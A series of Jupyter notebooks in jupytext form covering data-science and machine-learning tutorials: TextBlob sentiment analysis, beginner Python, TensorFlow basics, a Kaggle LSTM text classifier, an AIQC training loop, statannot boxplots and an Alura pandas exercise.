ax4.text(x+w*0.375, yi_text1, layers1, fontsize=(w*0.14), horizontalalignment='center', verticalalignment='top') ax4.text(x+w*0.375, yi_text2, layers2, fontsize=(w*0.14), horizontalalignment='center', verticalalignment='top') ax4.text(x+w*0.375, yi_text3, density, fontsize=(w*0.14), horizontalalignment='center', verticalalignment='center') plt.tight_layout() #mpl.savefig('../manuscript/figures/A-model-rifted-margin-grafics-estimated-model-alphas_2_1_2_1_2.png', dpi='figure', bbox_inches='tight') plt.show() # -
code/A-model-rifted-margin-model-(figures).ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Sentiment # - Sentiment detection ist bei Texten ein relativ altes Thema # - Seit Deep Learning sind die "alten" Methoden abgeschlagen # - Allerdings ist es nicht ganz trivial einen eigenen Classifier für Deep Learning zu schreiben # - Wenn ihr est trotzdem mal probieren wollt, dann findet ihr eine Anleitung in meinem Blog Post: # - https://www.liip.ch/en/blog/sentiment-detection-with-keras-word-embeddings-and-lstm-deep-learning-networks from textblob_de import TextBlobDE #from textblob import TexBlob TextBlobDE(u"Das Auto ist sehr schön!").sentiment blob = TextBlobDE(u"Das ist ein hässliches Auto.") blob.sentiment blob = TextBlobDE(u"Ich bin furchtbar sauer!") blob.sentiment blob = TextBlobDE(u"Das ist ein neutraler Satz.") blob.sentiment # # Spracherkennung # - wiederum ein einfaches Thema wird z.B. von TextblobDE unterstützt TextBlobDE(u"Ich gehe ins Schwimmbad").detect_language() TextBlobDE(u"Ide plywac").detect_language() TextBlobDE(u"I am going to the swimming pool").detect_language() TextBlobDE("Eu vou ao trem").detect_language() # # Spellchecking # - Geht aktuell leider nur auf englisch. # - Damit könnt ihr zumindest Eure englisch sprachigen Kollegen kontrollieren. from textblob import TextBlob blob = TextBlob(u'Writing easy sentences in english is easy but thei do hafe to be korrekt.') blob.correct() blob.words[10].spellcheck()
14 Text und Machine Learning/2.9 [OPTIONAL] Sentiment, Spracherkennung, Spellchecking.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # # Print print("Meow, saya adalah kucing") # # Variable pikiran = "saya merasa batal" pikiran pikiran = "saya merasa lapar" pikiran # # Fungsi pikiran.replace("lapar", "ngantuk") pikiran.upper() # kalau pakai fungsi tertentu, nilainya tidak ditimpa(inplace) pikiran = pikiran.replace("lapar", "ngantuk") pikiran def ngegas(x): return x.upper() + "!" ngegas(pikiran) pikiran # # List lokasi = ["meja","sofa","kursi","tv","dapur"] lokasi lokasi[0] lokasi[-1] lokasi.append("kasur") lokasi len(lokasi) #len adalah singkatan dari length # # Slicing lokasi[1:3] lokasi[2:5] lokasi[:4] lokasi[1:] # # Dictionary preferensi = {"susu": "suka", "tikus": "suka", "lemon": "tidak suka"} preferensi preferensi["susu"] preferensi["lemon"] preferensi["jeruk"] = "tidak suka" preferensi preferensi.keys() # # Conditional wadah = "seperti kasur" # + if wadah == "seperti kotak": print("masuk") elif wadah == "seperti bak mandi": print("kabur") else: print("abaikan") # - # # Iterasi jenis_kucing = ["angora","persia","siberia","mesir"] jenis_kucing[0] for jenis in jenis_kucing: print(jenis) for jenis in jenis_kucing: print(jenis.upper() + " adalah jenis kucing") for jenis in jenis_kucing: print(f"kucing {jenis.upper()} adalah jenis kucing") f"{pikiran} adalah sebuah pikiran" # # Latihan: Kucing berhitung for i in range(3, 7): print(i) for i in range(21): if i > 18: print(18) else: print(i) for i in range(21): print(min(i,18))
01 - Python Introduction/Part 2 - Python for cats.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Chapter 3 # ### Our first TensorFlow graph import tensorflow as tf a = tf.constant(5) b = tf.constant(2) c = tf.constant(3) d = tf.multiply(a,b) e = tf.add(c,b) f = tf.subtract(d,e) sess = tf.Session() outs = sess.run(f) sess.close() print("outs = {}".format(outs)) # ### Constructing and managing our graph # + import tensorflow as tf print(tf.get_default_graph()) g = tf.Graph() print(g) # + a = tf.constant(5) print(a.graph is g) print(a.graph is tf.get_default_graph()) # + g1 = tf.get_default_graph() g2 = tf.Graph() print(g1 is tf.get_default_graph()) with g2.as_default(): print(g1 is tf.get_default_graph()) print(g1 is tf.get_default_graph()) # - # ### Fetches # + with tf.Session() as sess: fetches = [a,b,c,d,e,f] outs = sess.run(fetches) print("outs = {}".format(outs)) print(type(outs[0])) # - # ### Nodes are operations, edges are Tensor objects c = tf.constant(4.0) print(c) # ### Data types c = tf.constant(4.0, dtype=tf.float64) print(c) print(c.dtype) x = tf.constant([1,2,3],name='x',dtype=tf.float32) print(x.dtype) x = tf.cast(x,tf.int64) print(x.dtype) # ### Tensor arrays and Shapes # + import numpy as np c = tf.constant([[1,2,3], [4,5,6]]) print("Python List input: {}".format(c.get_shape())) c = tf.constant(np.array([ [[1,2,3], [4,5,6]], [[1,1,1], [2,2,2]] ])) print("3d Numpy array input: {}".format(c.get_shape())) # + import matplotlib.pyplot as plt % matplotlib inline sess = tf.InteractiveSession() # === Noramal and Truncated normal distributions === mean = 0 std = 1 x_normal = tf.random_normal((1,50000),mean,std).eval() x_truncated = tf.truncated_normal((1,50000),mean,std).eval() # === Uniform distribution minval = -2 maxval = 2 x_uniform = tf.random_uniform((1,50000),minval,maxval).eval() sess.close() def simpleaxis(ax): ax.spines['top'].set_visible(False) ax.spines['right'].set_visible(False) ax.get_xaxis().tick_bottom() ax.get_yaxis().tick_left() # ax.set_ylim([-1.1,1.1]) ax.tick_params(axis='both', which='major', labelsize=15) def get_axis_limits(ax, scale=.8): return ax.get_xlim()[1]*scale, ax.get_ylim()[1]*scale f,axarr = plt.subplots(1,3,figsize=[15,4],sharey=True) titles = ['Normal','Truncated Normal','Uniform'] print(x_normal.shape) for i,x in enumerate([x_normal,x_truncated,x_uniform]): ax = axarr[i] ax.hist(x[0],bins=100,color='b',alpha=0.4) ax.set_title(titles[i],fontsize=20) ax.set_xlabel('Values',fontsize=20) ax.set_xlim([-5,5]) ax.set_ylim([0,1800]) simpleaxis(ax) axarr[0].set_ylabel('Frequency',fontsize=20) plt.suptitle('Initialized values',fontsize=30, y=1.15) for ax,letter in zip(axarr,['A','B','C']): simpleaxis(ax) ax.annotate(letter, xy=get_axis_limits(ax),fontsize=35) plt.tight_layout() plt.savefig('histograms.png', bbox_inches='tight', format='png', dpi=200, pad_inches=0,transparent=True) plt.show() # - sess = tf.InteractiveSession() c = tf.linspace(0.0, 4.0, 5) print("The content of 'c':\n {}\n".format(c.eval())) sess.close() # ### Matrix multiplication # + A = tf.constant([ [1,2,3], [4,5,6] ]) print(a.get_shape()) x = tf.constant([1,0,1]) print(x.get_shape()) x = tf.expand_dims(x,1) print(x.get_shape()) b = tf.matmul(A,x) sess = tf.InteractiveSession() print('matmul result:\n {}'.format(b.eval())) sess.close() # - # ### Names with tf.Graph().as_default(): c1 = tf.constant(4,dtype=tf.float64,name='c') c2 = tf.constant(4,dtype=tf.int32,name='c') print(c1.name) print(c2.name) # ### Name scopes # + with tf.Graph().as_default(): c1 = tf.constant(4,dtype=tf.float64,name='c') with tf.name_scope("prefix_name"): c2 = tf.constant(4,dtype=tf.int32,name='c') c3 = tf.constant(4,dtype=tf.float64,name='c') print(c1.name) print(c2.name) print(c3.name) # - # ### Variables # # + init_val = tf.random_normal((1,5),0,1) var = tf.Variable(init_val, name='var') print("pre run: \n{}".format(var)) init = tf.global_variables_initializer() with tf.Session() as sess: sess.run(init) post_var = sess.run(var) print("\npost run: \n{}".format(post_var)) # - # ### New variables are created each time # + init_val = tf.random_normal((1,5),0,1) var = tf.Variable(init_val, name='var') print("pre run: \n{}".format(var)) init = tf.global_variables_initializer() with tf.Session() as sess: sess.run(init) post_var = sess.run(var) print("\npost run: \n{}".format(post_var)) # - # ### Placeholders # + x_data = np.random.randn(5,10) w_data = np.random.randn(10,1) with tf.Graph().as_default(): x = tf.placeholder(tf.float32,shape=(5,10)) w = tf.placeholder(tf.float32,shape=(10,1)) b = tf.fill((5,1),-1.) xw = tf.matmul(x,w) xwb = xw + b s = tf.reduce_max(xwb) with tf.Session() as sess: outs = sess.run(s,feed_dict={x: x_data,w: w_data}) print("outs = {}".format(outs)) # - # ### Example 1: Linear Regression # + # === Create data and simulate results ===== x_data = np.random.randn(2000,3) w_real = [0.3,0.5,0.1] b_real = -0.2 noise = np.random.randn(1,2000)*0.1 y_data = np.matmul(w_real,x_data.T) + b_real + noise # + NUM_STEPS = 10 g = tf.Graph() wb_ = [] with g.as_default(): x = tf.placeholder(tf.float32,shape=[None,3]) y_true = tf.placeholder(tf.float32,shape=None) with tf.name_scope('inference') as scope: w = tf.Variable([[0,0,0]],dtype=tf.float32,name='weights') b = tf.Variable(0,dtype=tf.float32,name='bias') y_pred = tf.matmul(w,tf.transpose(x)) + b with tf.name_scope('loss') as scope: loss = tf.reduce_mean(tf.square(y_true-y_pred)) with tf.name_scope('train') as scope: learning_rate = 0.5 optimizer = tf.train.GradientDescentOptimizer(learning_rate) train = optimizer.minimize(loss) # Before starting, initialize the variables. We will 'run' this first. init = tf.global_variables_initializer() with tf.Session() as sess: sess.run(init) for step in range(NUM_STEPS): sess.run(train,{x: x_data, y_true: y_data}) if (step % 5 == 0): print(step, sess.run([w,b])) wb_.append(sess.run([w,b])) print(10, sess.run([w,b])) # - # ### Example 2: Logistic Regression # # + N = 20000 def sigmoid(x): return 1 / (1 + np.exp(-x)) # === Create data and simulate results ===== x_data = np.random.randn(N,3) w_real = [0.3,0.5,0.1] b_real = -0.2 wxb = np.matmul(w_real,x_data.T) + b_real y_data_pre_noise = sigmoid(wxb) y_data = np.random.binomial(1,y_data_pre_noise) # + NUM_STEPS = 50 g = tf.Graph() wb_ = [] with g.as_default(): x = tf.placeholder(tf.float32,shape=[None,3]) y_true = tf.placeholder(tf.float32,shape=None) with tf.name_scope('inference') as scope: w = tf.Variable([[0,0,0]],dtype=tf.float32,name='weights') b = tf.Variable(0,dtype=tf.float32,name='bias') y_pred = tf.matmul(w,tf.transpose(x)) + b with tf.name_scope('loss') as scope: loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true,logits=y_pred) loss = tf.reduce_mean(loss) with tf.name_scope('train') as scope: learning_rate = 0.5 optimizer = tf.train.GradientDescentOptimizer(learning_rate) train = optimizer.minimize(loss) # Before starting, initialize the variables. We will 'run' this first. init = tf.global_variables_initializer() with tf.Session() as sess: sess.run(init) for step in range(NUM_STEPS): sess.run(train,{x: x_data, y_true: y_data}) if (step % 5 == 0): print(step, sess.run([w,b])) wb_.append(sess.run([w,b])) print(50, sess.run([w,b]))
Learning Tensor Flow/03__tensorflow_basics/Chapter3.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19" _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5" import os, math import numpy as np import pandas as pd import itertools from keras.preprocessing.text import Tokenizer from keras.preprocessing.sequence import pad_sequences from keras.utils import to_categorical from keras.models import Sequential from keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation, CuDNNGRU, Conv1D, CuDNNLSTM, Dense from keras.layers import Bidirectional, GlobalMaxPool1D from keras.models import Model from keras import initializers, regularizers, constraints, optimizers, layers #nltk model from nltk.tokenize import RegexpTokenizer from tqdm import tqdm from sklearn.model_selection import train_test_split from sklearn.linear_model import LogisticRegression from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer from sklearn.decomposition import PCA, TruncatedSVD from sklearn.utils import resample from sklearn.ensemble import RandomForestClassifier from sklearn.metrics import confusion_matrix from sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, classification_report import matplotlib import matplotlib.patches as mpatches import matplotlib.pyplot as plt # + _uuid="b67995f2cd04efbd86747fbca05dea1450f82e8b" # + _uuid="0e487c746161cdc8bfaf09a24dd1bb874afef115" #pd.set_option('display.height', 1000) #pd.set_option('display.max_rows', 500) pd.set_option('display.max_columns', 500) #pd.set_option('display.width', 1000) # + [markdown] _uuid="575ad3a0505f95215153b70f9dc84c2cd3c011fa" # ## 1.Explore dataframe features # + _uuid="2aac670e30274b12dd31c8e06a5d403e45477baf" train_df = pd.read_csv("../input/train.csv") # 1. fill up the missing values test_df =pd.read_csv("../input/test.csv") print(train_df.head()) print(test_df.head()) # 2. Are there overlaps between train and test? No print(pd.core.common.intersection(train_df['question_text'], test_df['question_text']).tolist()) print(pd.core.common.intersection(train_df['qid'], test_df['qid']).tolist()) #3 Some data features # print('train data',train_df.info()) #print('test data',test_df.info()) #Are there replicated rows? No #print(train_df.nunique()) # + [markdown] _uuid="eb524f082e35bb9a43c53a07950f8fd45639e67d" # ## 2. Feature extraction from text # + _uuid="f13631ca516d65b2d60c8aeee26b93464cfda542" #1. Preprocession: Lowercase, stemming, lemmarization, stopwords def standardize_text(df, question_field): df[question_field] = df[question_field].str.replace(r"http\S+", "") df[question_field] = df[question_field].str.replace(r"http", "") df[question_field] = df[question_field].str.replace(r"@\S+", "") df[question_field] = df[question_field].str.replace(r"[^A-Za-z0-9(),!?@\'\`\"\_\n]", " ") df[question_field] = df[question_field].str.replace(r"@", "at") df[question_field] = df[question_field].str.lower() return df # 2. train_clean = train_df.copy(deep=True) # modification of the orginial df will not be affected test_clean = test_df.copy(deep=True) train_clean = standardize_text(train_clean, 'question_text') test_clean = standardize_text(test_clean, 'question_text') # 3. Are there overlaps between train and test question_text after preprocession? Yes print(pd.core.common.intersection(train_clean['question_text'], test_clean['question_text']).tolist()) # + _uuid="9a70477a85aca0d9df05ac6a6bbc80467c374998" # embdedding setup # Source https://blog.keras.io/using-pre-trained-word-embeddings-in-a-keras-model.html embeddings_index = {} f = open('../input/embeddings/glove.840B.300d/glove.840B.300d.txt') for line in tqdm(f): values = line.split(" ") word = values[0] coefs = np.asarray(values[1:], dtype='float32') embeddings_index[word] = coefs f.close() print('Found %s word vectors.' % len(embeddings_index)) # + _uuid="8f4912b409bd07c66b9b32f99212ad771ba61a63" train_df, val_df = train_test_split(train_clean, test_size=0.1) # + _uuid="dddcc226926e60d9eb674ef1c92734a4fa3058ab" # Convert values to embeddings def text_to_array(text): empyt_emb = np.zeros(300) text = text[:-1].split()[:30] embeds = [embeddings_index.get(x, empyt_emb) for x in text] embeds+= [empyt_emb] * (30 - len(embeds)) return np.array(embeds) # train_vects = [text_to_array(X_text) for X_text in tqdm(train_df["question_text"])] val_vects = np.array([text_to_array(X_text) for X_text in tqdm(val_df["question_text"][:3000])]) val_y = np.array(val_df["target"][:3000]) # + _uuid="4f2311e86d07936b88f8820928cc9adca4633a1f" # Data providers batch_size = 64 def batch_gen(train_df): n_batches = math.ceil(len(train_df) / batch_size) while True: train_df = train_df.sample(frac=1.) # Shuffle the data. for i in range(n_batches): texts = train_df.iloc[i*batch_size:(i+1)*batch_size, 1] text_arr = np.array([text_to_array(text) for text in texts]) yield text_arr, np.array(train_df["target"][i*batch_size:(i+1)*batch_size]) # + _uuid="c06041b7ee5792058819c138cc63b825cfa189d3" from keras.models import Sequential from keras.layers import CuDNNLSTM, Dense, Bidirectional # + _uuid="ef50d94d338ef4e7e2309ce12c49e0fb3b811578" model = Sequential() model.add(Bidirectional(CuDNNLSTM(64, return_sequences=True), input_shape=(30, 300))) model.add(Bidirectional(CuDNNLSTM(64))) model.add(Dense(1, activation="sigmoid")) model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) # + _uuid="f344ba26a37fa4ac83f7f3104bee41bff5617f82" mg = batch_gen(train_df) model.fit_generator(mg, epochs=20, steps_per_epoch=1000, validation_data=(val_vects, val_y), verbose=True) # + _uuid="d1c01b5a704854c36229996b3f894e5f9bfb9092" #prediction part batch_size = 256 def batch_gen(test_df): n_batches = math.ceil(len(test_df) / batch_size) for i in range(n_batches): texts = test_df.iloc[i*batch_size:(i+1)*batch_size, 1] text_arr = np.array([text_to_array(text) for text in texts]) yield text_arr test_df = pd.read_csv("../input/test.csv") all_preds = [] for x in tqdm(batch_gen(test_df)): all_preds.extend(model.predict(x).flatten()) # + _uuid="ba5fd8920241e54810f5d6bdbfd8b6f4bbf71da2" y_te = (np.array(all_preds) > 0.5).astype(np.int) submit_df = pd.DataFrame({"qid": test_df["qid"], "prediction": y_te}) submit_df.to_csv("submission.csv", index=False) # + _uuid="cad4d9a7345aff3603e6a65f55b75625fd187d51" # !head submission.csv # + _uuid="b8a016529af0d8ff2bcd7887ba20f5de110f81c1"
notebooks/tfidf-lstm-v2-embedding-nosstem.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # TensorFlow2: Training Loop. # ![gradient](../images/gradient_descent.png) # Although Keras is suitable for the vast majority of use cases, in the following scenarios, it may make sense to forgo `model.fit()` to manually define a training loop: # # - Maintaining legacy code and retraining old models. # - Custom batch/ epoch operations like gradients and backpropagation. Even then, PyTorch may be a better fit for customization. # # > Disclaimer; This notebook demonstrates how to manually define a training loop for queued tuning of a binary classification model. However, it is only included to prove that AIQC technically supports TensorFlow out-of-the-box with `analysis_type='keras'`, and to demonstrate how expert practicioners to do continue to use their favorite tools. We neither claim to be experts on the inner-workings of TensorFlow, nor do we intend to troubleshoot advanced methodologies for users that are in over their heads. # # Reference this repository for more TensorFlow cookbooks: # > https://github.com/IvanBongiorni/TensorFlow2.0_Notebooks # + import tensorflow as tf from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense, Dropout from sklearn.preprocessing import LabelBinarizer, PowerTransformer import aiqc from aiqc import datum # - # --- # ## Example Data # Reference [Example Datasets](example_datasets.ipynb) for more information. df = datum.to_pandas('sonar.csv') df.head() # --- # ## a) High-Level API # Reference [High-Level API Docs](api_high_level.ipynb) for more information including how to work with non-tabular data. splitset = aiqc.Pipeline.Tabular.make( df_or_path = df , dtype = None , feature_cols_excluded = 'object' , feature_interpolaters = None , feature_window = None , feature_encoders = dict( sklearn_preprocess = PowerTransformer(method='yeo-johnson', copy=False) , dtypes = ['float64'] ) , feature_reshape_indices = None , label_column = 'object' , label_interpolater = None , label_encoder = dict(sklearn_preprocess = LabelBinarizer(sparse_output=False)) , size_test = 0.12 , size_validation = 0.22 , fold_count = None , bin_count = None ) def fn_build(features_shape, label_shape, **hp): model = Sequential(name='Sonar') model.add(Dense(hp['neuron_count'], activation='relu', kernel_initializer='he_uniform')) model.add(Dropout(0.30)) model.add(Dense(hp['neuron_count'], activation='relu', kernel_initializer='he_uniform')) model.add(Dropout(0.30)) model.add(Dense(hp['neuron_count'], activation='relu', kernel_initializer='he_uniform')) model.add(Dense(units=label_shape[0], activation='sigmoid', kernel_initializer='glorot_uniform')) return model def fn_lose(**hp): loser = tf.losses.BinaryCrossentropy() return loser def fn_optimize(**hp): optimizer = tf.optimizers.Adamax() return optimizer def fn_train(model, loser, optimizer, samples_train, samples_evaluate, **hp): batched_train_features, batched_train_labels = aiqc.tf_batcher( features = samples_train['features'] , labels = samples_train['labels'] , batch_size = 5 ) # Still necessary for saving entire model. model.compile(loss=loser, optimizer=optimizer) ## --- Metrics --- acc = tf.metrics.BinaryAccuracy() # Mirrors `keras.model.History.history` object. history = { 'loss':list(), 'accuracy': list(), 'val_loss':list(), 'val_accuracy':list() } ## --- Training loop --- for epoch in range(hp['epochs']): # --- Batch training --- for i, batch in enumerate(batched_train_features): with tf.GradientTape() as tape: batch_loss = loser( batched_train_labels[i], model(batched_train_features[i]) ) # Update weights based on the gradient of the loss function. gradients = tape.gradient(batch_loss, model.trainable_variables) optimizer.apply_gradients(zip(gradients, model.trainable_variables)) ## --- Epoch metrics --- # Overall performance on training data. train_probability = model.predict(samples_train['features']) train_loss = loser(samples_train['labels'], train_probability) train_acc = acc(samples_train['labels'], train_probability) history['loss'].append(float(train_loss)) history['accuracy'].append(float(train_acc)) # Performance on evaluation data. eval_probability = model.predict(samples_evaluate['features']) eval_loss = loser(samples_evaluate['labels'], eval_probability) eval_acc = acc(samples_evaluate['labels'], eval_probability) history['val_loss'].append(float(eval_loss)) history['val_accuracy'].append(float(eval_acc)) # Attach history to the model so we can return a single object. model.history.history = history return model hyperparameters = { "neuron_count": [25, 50] , "epochs": [75, 150] } queue = aiqc.Experiment.make( library = "keras" , analysis_type = "classification_binary" , fn_build = fn_build , fn_train = fn_train , fn_lose = fn_lose , fn_optimize = fn_optimize , splitset_id = splitset.id , repeat_count = 1 , hide_test = False , hyperparameters = hyperparameters , fn_predict = None #automated , foldset_id = None ) queue.run_jobs() # For more information on visualization of performance metrics, reference the [Visualization & Metrics](visualization.html) documentation. # --- # ## b) Low-Level API # Reference [Low-Level API Docs](api_high_level.ipynb) for more information including how to work with non-tabular data and defining optimizers. dataset = aiqc.Dataset.Tabular.from_pandas(df) label_column = 'object' label = dataset.make_label(columns=[label_column]) labelcoder = label.make_labelcoder( sklearn_preprocess = LabelBinarizer(sparse_output=False) ) feature = dataset.make_feature(exclude_columns=[label_column]) encoderset = feature.make_encoderset() featurecoder_0 = encoderset.make_featurecoder( sklearn_preprocess = PowerTransformer(method='yeo-johnson', copy=False) , dtypes = ['float64'] ) splitset = aiqc.Splitset.make( feature_ids = [feature.id] , label_id = label.id , size_test = 0.22 , size_validation = 0.12 ) def fn_build(features_shape, label_shape, **hp): model = Sequential(name='Sonar') model.add(Dense(hp['neuron_count'], activation='relu', kernel_initializer='he_uniform')) model.add(Dropout(0.30)) model.add(Dense(hp['neuron_count'], activation='relu', kernel_initializer='he_uniform')) model.add(Dropout(0.30)) model.add(Dense(hp['neuron_count'], activation='relu', kernel_initializer='he_uniform')) model.add(Dense(units=label_shape[0], activation='sigmoid', kernel_initializer='glorot_uniform')) return model def fn_lose(**hp): loser = tf.losses.BinaryCrossentropy() return loser def fn_optimize(**hp): optimizer = tf.optimizers.Adamax() return optimizer def fn_train(model, loser, optimizer, samples_train, samples_evaluate, **hp): batched_train_features, batched_train_labels = aiqc.tf_batcher( features = samples_train['features'] , labels = samples_train['labels'] , batch_size = 5 ) # Still necessary for saving entire model. model.compile(loss=loser, optimizer=optimizer) ## --- Metrics --- acc = tf.metrics.BinaryAccuracy() # Mirrors `keras.model.History.history` object. history = { 'loss':list(), 'accuracy': list(), 'val_loss':list(), 'val_accuracy':list() } ## --- Training loop --- for epoch in range(hp['epochs']): # --- Batch training --- for i, batch in enumerate(batched_train_features): with tf.GradientTape() as tape: batch_loss = loser( batched_train_labels[i], model(batched_train_features[i]) ) # Update weights based on the gradient of the loss function. gradients = tape.gradient(batch_loss, model.trainable_variables) optimizer.apply_gradients(zip(gradients, model.trainable_variables)) ## --- Epoch metrics --- # Overall performance on training data. train_probability = model.predict(samples_train['features']) train_loss = loser(samples_train['labels'], train_probability) train_acc = acc(samples_train['labels'], train_probability) history['loss'].append(float(train_loss)) history['accuracy'].append(float(train_acc)) # Performance on evaluation data. eval_probability = model.predict(samples_evaluate['features']) eval_loss = loser(samples_evaluate['labels'], eval_probability) eval_acc = acc(samples_evaluate['labels'], eval_probability) history['val_loss'].append(float(eval_loss)) history['val_accuracy'].append(float(eval_acc)) # Attach history to the model so we can return a single object. model.history.history = history return model algorithm = aiqc.Algorithm.make( library = "keras" , analysis_type = "classification_binary" , fn_build = fn_build , fn_train = fn_train , fn_lose = fn_lose , fn_optimize = fn_optimize ) hyperparameters = { "neuron_count": [25, 50] , "epochs": [75, 150] } hyperparameters = { "neuron_count": [25, 50] , "epochs": [75, 150] } hyperparamset = algorithm.make_hyperparamset( hyperparameters = hyperparameters ) queue = algorithm.make_queue( splitset_id = splitset.id , hyperparamset_id = hyperparamset.id , repeat_count = 2 ) queue.run_jobs() # For more information on visualization of performance metrics, reference the [Visualization & Metrics](visualization.html) documentation.
docs/_build/doctrees/nbsphinx/notebooks/tensorflow_binary_classification.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + # %matplotlib inline import matplotlib.pyplot as plt import seaborn as sns import pandas as pd import numpy as np from statannot import add_stat_annotation from pandas.compat import StringIO dfstring = """Index Control "FBS 1%" "FBS 3%" 0 0.494348 1.196539 0.921887 1 0.556027 0.940206 1.153515 2 0.445540 NaN 1.108820 3 0.464731 0.931461 0.956742 4 0.393526 0.894547 1.073090 5 0.479290 NaN 1.099829 6 0.683442 0.936075 NaN 7 0.667166 NaN NaN 8 0.526530 NaN NaN 9 0.499731 NaN NaN""" data = pd.read_csv(StringIO(dfstring), delim_whitespace=True, index_col=0) print(data) # - ax = sns.boxplot(data=data) fig = plt.gcf() test_results = add_stat_annotation(ax, data, box_pairs=[('Control','FBS 1%'), ('Control','FBS 3%'), ('FBS 1%','FBS 3%')], test='t-test_ind', text_format='star', loc='outside', verbose=1) test_results # ### Boxplot non-hue sns.set(style="whitegrid") df = sns.load_dataset("tips") x = "day" y = "total_bill" order = ['Sun', 'Thur', 'Fri', 'Sat'] ax = sns.boxplot(data=df, x=x, y=y, order=order) add_stat_annotation(ax, data=df, x=x, y=y, order=order, box_pairs=[("Thur", "Fri"), ("Thur", "Sat"), ("Fri", "Sun")], test='Mann-Whitney', text_format='star', loc='outside', verbose=2) plt.savefig('example1.png', dpi=300, bbox_inches='tight') # ### Boxplot with hue x = "day" y = "total_bill" hue = "smoker" ax = sns.boxplot(data=df, x=x, y=y, hue=hue) add_stat_annotation(ax, data=df, x=x, y=y, hue=hue, box_pairs=[(("Thur", "No"), ("Fri", "No")), (("Sat", "Yes"), ("Sat", "No")), (("Sun", "No"), ("Thur", "Yes")) ], test='t-test_welch', text_format='full', pvalue_format_string='{:.2f}', loc='inside', verbose=2) plt.legend(loc='upper left', bbox_to_anchor=(1.03, 1)) plt.savefig('example2.png', dpi=300, bbox_inches='tight') # ### Boxplot with bucketed categories df['tip_bucket'] = pd.cut(df['tip'], 3) df.head() # + # In this case we just have to pass the list of categories objects to the add_stat_annotation function. tip_bucket_list = df['tip_bucket'].unique() tip_bucket_list # - x = "day" y = "total_bill" hue = "tip_bucket" data = df ax = sns.boxplot(data=df, x=x, y=y, hue=hue) add_stat_annotation(ax, data=df, x=x, y=y, hue=hue, box_pairs=[(("Sat", tip_bucket_list[2]), ("Fri", tip_bucket_list[0]))], test='t-test_ind', loc='inside', verbose=2) plt.legend(loc='upper left', bbox_to_anchor=(1.03, 1)) # ### Tuning y offsets x = "day" y = "total_bill" hue = "smoker" ax = sns.boxplot(data=df, x=x, y=y, hue=hue) add_stat_annotation(ax, data=df, x=x, y=y, hue=hue, box_pairs=[(("Thur", "No"), ("Fri", "No")), (("Sat", "Yes"), ("Sat", "No")), (("Sun", "No"), ("Thur", "Yes")) ], test='t-test_ind', text_format='full', loc='inside', line_offset_to_box=0.2, line_offset=0.02, line_height=0.02, text_offset=2, verbose=2) plt.legend(loc='upper left', bbox_to_anchor=(1.03, 1)) # + # In certain cases, we would prefer to place each annotation just above the boxes, # without increasing the y offset. x = "day" y = "total_bill" hue = "smoker" ax = sns.boxplot(data=df, x=x, y=y, hue=hue) add_stat_annotation(ax, data=df, x=x, y=y, hue=hue, box_pairs=[((day, "Yes"), (day, "No")) for day in df['day'].unique()], test='t-test_ind', text_format='star', loc='inside', stack=False) plt.legend(loc='upper left', bbox_to_anchor=(1.03, 1))
example/example.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/HenriqueCCdA/bootCampAluraDataScience/blob/master/modulo1/desafios/Desafio_aula2_modulo1_pynb.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + [markdown] id="DUM31X_UYcz7" # # Desafios aula 2 do modulo 1 # + id="77I4MBxYX-jn" import pandas as pd import matplotlib.pyplot as plt # pandas configuracao pd.options.display.float_format ="{:.2f}".format # + colab={"base_uri": "https://localhost:8080/"} id="NIQnEPw3Xuis" outputId="c3064df7-0658-412b-b03a-e306375d22ba" uri = "https://raw.githubusercontent.com/alura-cursos/agendamento-hospitalar/main/dados/A160324189_28_143_208.csv" dados = pd.read_csv(uri, encoding="ISO-8859-1", skiprows = 3, sep=";", skipfooter=12, thousands=".", decimal=",") # + id="sEbuSJggYFko" colunas_usaveis = dados.mean().index.tolist() colunas_usaveis.insert(0, "Unidade da Federação") dados_usaveis = dados[colunas_usaveis] dados_usaveis = dados_usaveis.set_index("Unidade da Federação") dados_usaveis = dados_usaveis.drop("Total", axis=1) # + [markdown] id="DP8hRm3RYSMt" # # Desafio 01: Reposicionar a legenda do gráfico em uma posição mais adequada # + colab={"base_uri": "https://localhost:8080/", "height": 499} id="RiY08WU_YUbA" outputId="49b768aa-a8b5-4599-f1fb-d2a257c631dd" dados_usaveis.T.plot(figsize=(12, 8)) plt.legend(title= "Estados", loc ='lower right', bbox_to_anchor=(1.25, 0.05)) plt.show() # + [markdown] id="PAUeLy1WYVJE" # # Desafio 02: Plotar o gráfico de linha com apenas 5 estados de sua preferência # + colab={"base_uri": "https://localhost:8080/"} id="9qcxlJNZYYEo" outputId="2fa85263-d31b-4fa7-f95c-5820bf90901d" dados_usaveis.index # + 